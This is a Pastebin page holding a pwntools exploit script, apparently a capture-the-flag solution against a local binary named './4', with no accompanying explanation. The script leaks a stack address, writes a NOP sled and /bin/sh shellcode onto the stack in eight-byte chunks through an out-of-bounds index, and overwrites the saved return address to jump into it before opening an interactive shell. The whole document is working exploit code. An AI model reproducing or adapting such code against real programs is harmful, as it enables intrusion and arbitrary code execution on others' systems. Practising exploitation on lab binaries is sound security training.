Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python3
- # -*- coding: utf-8 -*-
- # This exploit template was generated via:
- # $ pwn template
- from pwn import *
- from ctypes import *
- # Set up pwntools for the correct architecture
- context.update(arch='amd64')
- exe = context.binary ='./4'
- # Many built-in settings can be controlled on the command-line and show up
- # in "args". For example, to dump all data sent/received, and disable ASLR
- # for all created processes...
- # ./exploit.py DEBUG NOASLR
- def start(argv=[], *a, **kw):
- '''Start the exploit against the target.'''
- if args.GDB:
- return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
- else:
- return process([exe] + argv, *a, **kw)
- # Specify your GDB script here for debugging
- # GDB will be launched if the exploit is run via e.g.
- # ./exploit.py GDB
- gdbscript = '''
- continue
- '''.format(**locals())
- #===========================================================
- # EXPLOIT GOES HERE
- #===========================================================
- io = start()
- nopslide=asm(
- "nop\n"*304
- )
- shellcode = asm(shellcraft.amd64.sh())
- #get stack addr
- io.recvuntil("Exit\n")
- io.send(b"2\n")
- io.recvuntil(b"read?")
- io.send(b"15\n")
- io.recvuntil("for: ")
- dataleak=int(io.recvuntil(b"1)").split(b"1)")[0])
- p=nopslide+shellcode
- print("dataleak: 0x%x"%dataleak)
- io.recvuntil(b"Exit\n")
- io.send(b"1\n")
- io.recvuntil("number\n")
- io.send(b"-1\n")
- io.recvuntil("number!\n")
- io.send(b"99999999999999999\n")
- for i in range(len(p)//8):
- io.recvuntil("Exit\n")
- io.sendline("1")
- io.recv()
- io.sendline(str(16+i))
- shellcode_part = p[0+8*i:i*8+8]
- shellcode_int = int.from_bytes(shellcode_part, byteorder='little')
- print(shellcode_part)
- print(str(shellcode_int))
- if(shellcode_int > 0x7fffffffffffffff):
- shellcode_int = (c_long(shellcode_int)).value
- io.sendline(str(shellcode_int))
- #modify to enter the nopslide
- dataleak-=120
- io.recvuntil("Exit")
- io.sendline("1")
- io.recv()
- io.sendline(str("66")) #rbp + 1
- io.sendline(str(dataleak))
- io.recv()
- io.send("0\n")
- #print("0x%x"%addr)
- #io.send(padding+addr)
- #io.send(nopslide+shellcode+b"\n")
- io.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement